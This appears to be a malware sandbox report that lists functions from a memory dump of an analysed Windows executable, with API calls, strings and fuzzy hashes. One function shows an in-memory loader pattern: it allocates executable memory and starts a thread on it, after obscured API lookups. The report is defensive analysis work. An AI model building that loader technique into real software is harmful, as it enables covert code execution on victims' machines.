Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: e77b5c18e222db7390d548bdd3d9da7810ee75ee44c325311cc9f60c8fbcc34f
Instruction ID: bfcbbf47899f46ca7af956bfebcedc02c40d9342279a8d610618e4cc97e93452
Opcode Fuzzy Hash: e77b5c18e222db7390d548bdd3d9da7810ee75ee44c325311cc9f60c8fbcc34f
Instruction Fuzzy Hash: 1971D77260020AAADB24AB36DC42B7B77A8EF44704F15442FF706D7281EB7CE9418769

Function 004E4D66 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 004E4D72
IsDebuggerPresent.KERNEL32 ref: 004E4E3E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004E4E57
UnhandledExceptionFilter.KERNEL32(?), ref: 004E4E61

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: b8e5674774802f4149373045c21124f69b5d5b3637a6b301706219299bcae827
Instruction ID: 61adcd050349baddc2c21714797cb9ead7d526a96001cf1d87ddd87a20805316
Opcode Fuzzy Hash: b8e5674774802f4149373045c21124f69b5d5b3637a6b301706219299bcae827
Instruction Fuzzy Hash: 97311675D05228DBDF20DFA5D9497CDBBB8BF08305F1041AAE40CAB250EB749A85CF48

Function 004F721A Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F726E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F72B8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F737E

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: f45e8a9ce2e23d164c8551cca6d7b3c46d2b7d8226983528995eecaeaafbc98a
Instruction ID: 36abf2267d26aceaa68419d4f2a326957d4fce8fcdf1d73cea235fb99907d267
Opcode Fuzzy Hash: f45e8a9ce2e23d164c8551cca6d7b3c46d2b7d8226983528995eecaeaafbc98a
Instruction Fuzzy Hash: 0861707154420BABDB24DF29CC82BBA77A8EF04304F14407AEE05C6685E73CD945DB58

Function 004E8CD3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 004E8DCB
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 004E8DD5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 004E8DE2

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 96f830008991444f0fc5df9511cc1cf751bc1ad2622ad09cfa585a46701ce623
Instruction ID: d06853a39a722bd5455365a8d74c4f9b99cba6f8133b6ed4faaab8476c0d2784
Opcode Fuzzy Hash: 96f830008991444f0fc5df9511cc1cf751bc1ad2622ad09cfa585a46701ce623
Instruction Fuzzy Hash: AC31D5749012289BCB21DF65DC8979DBBB4BF18315F5041EAE40CA7251EB749F818F48

Function 004F70F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

EnumSystemLocalesW.KERNEL32(004F721A,00000001,00000000,?,-00000050,?,004F784B,00000000,?,?,?,00000055,?), ref: 004F7166

Strings

KxO, xrefs: 004F713B

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID: KxO
API String ID: 2417226690-2181764300
Opcode ID: 539ff4195afdc0c0ebd2f53568824257c04519c4f4e5c6aa64075389d7a15a2c
Instruction ID: ba56fa12d36eab429dcd774302922a53e9ea80ff63baa4053078fe41cef2e820
Opcode Fuzzy Hash: 539ff4195afdc0c0ebd2f53568824257c04519c4f4e5c6aa64075389d7a15a2c
Instruction Fuzzy Hash: D01106366047055FDB189F39C9A167BBB91FB80358B14442EE64687740D779A906C744

Function 004F4253 Relevance: 1.6, APIs: 1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c3b630824c0e20bd1bcfe9e794ccb396f88b9ceef15560a2c7fa61ba2e65a45
Instruction ID: 19791166a4e2555571c2edcaafd3ad1be0c124d3a57e95160dbab102905b60b7
Opcode Fuzzy Hash: 3c3b630824c0e20bd1bcfe9e794ccb396f88b9ceef15560a2c7fa61ba2e65a45
Instruction Fuzzy Hash: 6141B4B580421DAEDF10DF69CC89ABBBBB9EF85304F1442DEE518D3201DA399E448F24

Function 004F746D Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004F74C1

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 57f440bb1a6ac3958d5e4fd53426837b9f002d49aa7f82841c45820fc43ade62
Instruction ID: 28816543a8e7ce1cabcd72767dccc4de1679e7f8a7adfc4539e00cfe3e5a8445
Opcode Fuzzy Hash: 57f440bb1a6ac3958d5e4fd53426837b9f002d49aa7f82841c45820fc43ade62
Instruction Fuzzy Hash: 8921907160820AABDB289E26DC42A7B77A8EF05319F10507FEB02D6641EB3CED048658

Function 004F769C Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004F7436,00000000,00000000,?), ref: 004F76C8

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 717ba3ee4fb77ea506dccc0afc01da8d40099843651a78f56335941b063d2a15
Instruction ID: 1d6229b0a271a168a8322fe19f5e54dc18ee60d2ad35e4768bd8a9114e62310a
Opcode Fuzzy Hash: 717ba3ee4fb77ea506dccc0afc01da8d40099843651a78f56335941b063d2a15
Instruction Fuzzy Hash: 0EF0FE325141156BDB245655C8056FB7754EB40354F14042ADE16E3240EA7CFD01C594

Function 004F718F Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

EnumSystemLocalesW.KERNEL32(004F746D,00000001,00000000,?,-00000050,?,004F780F,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004F71D9

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5cc9490ebeca2c8d1d0be8e39cea3dca7a466827638a0e41586c81c30cba7762
Instruction ID: de454af7c6a58bbcef87b8d405a062ce6159f6a457a4792de2934551560e2a8a
Opcode Fuzzy Hash: 5cc9490ebeca2c8d1d0be8e39cea3dca7a466827638a0e41586c81c30cba7762
Instruction Fuzzy Hash: C2F0C2362043085FEB145F769C81A7B7B95EB80768F15843EFA068B780D6B9AC46CA58

Function 004EEDDF Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EA676: EnterCriticalSection.KERNEL32(?,?,004EE728,?,005056A8,00000008,004EE8EC,?,?,?), ref: 004EA685

EnumSystemLocalesW.KERNEL32(004EEDD2,00000001,00505728,0000000C,004EF201,00000000), ref: 004EEE17

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 7416e99af4e98fdbcd512d5afc14a955f660980b4d3eb90ba40ff5f707ced376
Instruction ID: 64185a46660f2e8a16c9413f8fda54f33d2f5171892847c5bf36404db71cef4f
Opcode Fuzzy Hash: 7416e99af4e98fdbcd512d5afc14a955f660980b4d3eb90ba40ff5f707ced376
Instruction Fuzzy Hash: 4DF03C32A00340DFD700EF9AE842B5D77F0FB4872AF10412AF4019B3A0D77959449F89

Function 004F70A9 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 004EEA50: GetLastError.KERNEL32(?,00000008,004F2F56,00000000,004E8E50), ref: 004EEA54
Part of subcall function 004EEA50: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 004EEAF6

EnumSystemLocalesW.KERNEL32(004F7002,00000001,00000000,?,?,004F786D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004F70E0

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 0ce673d25fbfe72c012b3c776a1e18e0b664d4da21e651f4e10dedca6bb076e2
Instruction ID: 97c60d57c6ad54f43b2f0646a152ecddb945d3296f5ac491dde947c9af9fe6b8
Opcode Fuzzy Hash: 0ce673d25fbfe72c012b3c776a1e18e0b664d4da21e651f4e10dedca6bb076e2
Instruction Fuzzy Hash: 7CF055363002095BCB049F3AC84577B7F90FFC1724B06406EEB0A8B241CA7A9842C798

Function 004EF305 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,004ED5C2,?,20001004,00000000,00000002,?,?,004ECBC4), ref: 004EF339

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 5c580153b1e4e905aaa56b9c4e306be7617a5a753c2d38bcf0a7b86783ec9147
Instruction ID: 2e3024cfb0a8c74aee20d9c2b735023d868f5afbd455563b1bb72c5a29de7454
Opcode Fuzzy Hash: 5c580153b1e4e905aaa56b9c4e306be7617a5a753c2d38bcf0a7b86783ec9147
Instruction Fuzzy Hash: F7E04F36500268BBCF126F63DC05AAF3E16EF44761F008026FD1566260CB758D21EA99

Function 004E4EC2 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00004ECE,004E453C), ref: 004E4EC7

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7641affa20c76d27e11b6974c606a37ce10003dcf96a0f371f58a2a9b1f8dbd4
Instruction ID: d5e50c7785359b9741839207c2065ade165948055195899e0a846a0fe7f6b6c2
Opcode Fuzzy Hash: 7641affa20c76d27e11b6974c606a37ce10003dcf96a0f371f58a2a9b1f8dbd4
Instruction Fuzzy Hash:

Function 004F79CD Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 004F79CD

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 18f808b5419bd7bacac3ca119623e034e8554a9b3e0ac4f61d290d51e60bb3d5
Instruction ID: 4a402e3af0d07b039de2b29a61f3e419750fc677b77660c07be185f93fd0bd55
Opcode Fuzzy Hash: 18f808b5419bd7bacac3ca119623e034e8554a9b3e0ac4f61d290d51e60bb3d5
Instruction Fuzzy Hash: FBA002B0A13301CF9B408F36AF5931D3BEABA556E6B059079A445C6170EF34C4A4FF06

Function 004FC25D Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 55libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004E10D0: __EH_prolog3_catch.LIBCMT ref: 004E10D7
Part of subcall function 004E10D0: _strlen.LIBCMT ref: 004E10E9

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004FC285

Part of subcall function 004E163E: _strlen.LIBCMT ref: 004E1656

_strlen.LIBCMT ref: 004FC2A0
_strlen.LIBCMT ref: 004FC2B6
GetProcAddress.KERNEL32(00000000,?), ref: 004FC2D3

Part of subcall function 004FC1F7: VirtualAlloc.KERNELBASE(00000000,000004AC,00001000,00000040,ole,00000000,?,?,004FC2E6), ref: 004FC20B
Part of subcall function 004FC1F7: CreateThread.KERNELBASE(00000000,00000000,00000188,MZx,00000000,00000000), ref: 004FC23F
Part of subcall function 004FC1F7: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,?,004FC2E6), ref: 004FC24B
Part of subcall function 004FC1F7: CloseHandle.KERNEL32(00000000,?,?,004FC2E6), ref: 004FC252

Part of subcall function 004E1BEA: _Deallocate.LIBCONCRT ref: 004E1BF9

Strings

kernel32.dll, xrefs: 004FC280
Madino Mino, xrefs: 004FC26F
Cons, xrefs: 004FC29A, 004FC29F, 004FC2A7
Free, xrefs: 004FC28B
ole, xrefs: 004FC2B0, 004FC2B5, 004FC2BD

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: _strlen$Handle$AddressAllocCloseCreateDeallocateH_prolog3_catchModuleObjectProcSingleThreadVirtualWait
String ID: Cons$Free$Madino Mino$kernel32.dll$ole
API String ID: 4115190924-2348686229
Opcode ID: 6d943ea69e72508cb10a5fe76091d55f0042c64fd71659cea4adcccca635f8c0
Instruction ID: 00fbd9e9f5ded55236f4e75f75143d0443492c60797e8fd74ddc61aacc3f5fac
Opcode Fuzzy Hash: 6d943ea69e72508cb10a5fe76091d55f0042c64fd71659cea4adcccca635f8c0
Instruction Fuzzy Hash: D301C831D40208AF8B14EBA6DC568FE73B9EF44705B20401FF901A2195EF3C6906D66D

Function 004E20F3 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E20FA
std::_Lockit::_Lockit.LIBCPMT ref: 004E2104
int.LIBCPMT ref: 004E211B

Part of subcall function 004E2653: std::_Lockit::_Lockit.LIBCPMT ref: 004E2664
Part of subcall function 004E2653: std::_Lockit::~_Lockit.LIBCPMT ref: 004E267E

codecvt.LIBCPMT ref: 004E213E
std::_Facet_Register.LIBCPMT ref: 004E2155
std::_Lockit::~_Lockit.LIBCPMT ref: 004E2175
Concurrency::cancel_current_task.LIBCPMT ref: 004E2182

Strings

@>U, xrefs: 004E210F

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
String ID: @>U
API String ID: 2133458128-3575638740
Opcode ID: 0359fa2ea2317bcf4a3d65f2edea21af0b32306a9f0d6dceadaa68fe987c9491
Instruction ID: 6746443ffee43d93abaf00a5efae3750757ca8a4ca12de988bb1deb4a0a0b3ae
Opcode Fuzzy Hash: 0359fa2ea2317bcf4a3d65f2edea21af0b32306a9f0d6dceadaa68fe987c9491
Instruction Fuzzy Hash: CF0104319002958BCB02EF63C9166BEB7AABF9071BF10040EF40067292CFF89F018789

Function 004E2188 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004E218F
std::_Lockit::_Lockit.LIBCPMT ref: 004E2199
int.LIBCPMT ref: 004E21B0

Part of subcall function 004E2653: std::_Lockit::_Lockit.LIBCPMT ref: 004E2664
Part of subcall function 004E2653: std::_Lockit::~_Lockit.LIBCPMT ref: 004E267E

ctype.LIBCPMT ref: 004E21D3
std::_Facet_Register.LIBCPMT ref: 004E21EA
std::_Lockit::~_Lockit.LIBCPMT ref: 004E220A
Concurrency::cancel_current_task.LIBCPMT ref: 004E2217

Strings

8?U, xrefs: 004E21A4

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
String ID: 8?U
API String ID: 2958136301-2531713661
Opcode ID: 861e2b54b8e8e38edf3c595ef14644062723b856b9a9cda94f28ac584fd96369
Instruction ID: 25d2d7c5f1c6f989f5522aacccd5d0e2cb5f4d24dd802bd8cec101e046258eb7
Opcode Fuzzy Hash: 861e2b54b8e8e38edf3c595ef14644062723b856b9a9cda94f28ac584fd96369
Instruction Fuzzy Hash: 1B0104719002959BCB05EF63C916ABE77B9AF80716F14044FE41467292CFBC9E01CB99

Function 004E7BE8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 004E7D07
___TypeMatch.LIBVCRUNTIME ref: 004E7E15
_UnwindNestedFrames.LIBCMT ref: 004E7F67
CallUnexpected.LIBVCRUNTIME ref: 004E7F82

Strings

csm, xrefs: 004E7C25
csm, xrefs: 004E7C92
csm, xrefs: 004E7D3E

Memory Dump Source

Source File: 00000007.00000002.2180986614.00000000004E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000007.00000002.2180966599.00000000004E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181010552.00000000004FD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181029964.0000000000507000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2181082386.0000000000555000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4e0000_xq6J5KlULX6jlR3rET0T.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 4a8f8446b35b6992b382d16b788a4c5adfc1a26eb7b49dc0597ead81135f02d9
Instruction ID: 58728b5bcb4be19f718b77b4e933acbc2002baa518fb2b89113c107cc89c5713
Opcode Fuzzy Hash: 4a8f8446b35b6992b382d16b788a4c5adfc1a26eb7b49dc0597ead81135f02d9
Instruction Fuzzy Hash: A9B18D31C04289AFCF14DFA6C8819AEBBB5BF14326F14459BE8056B302D738DA51CB99

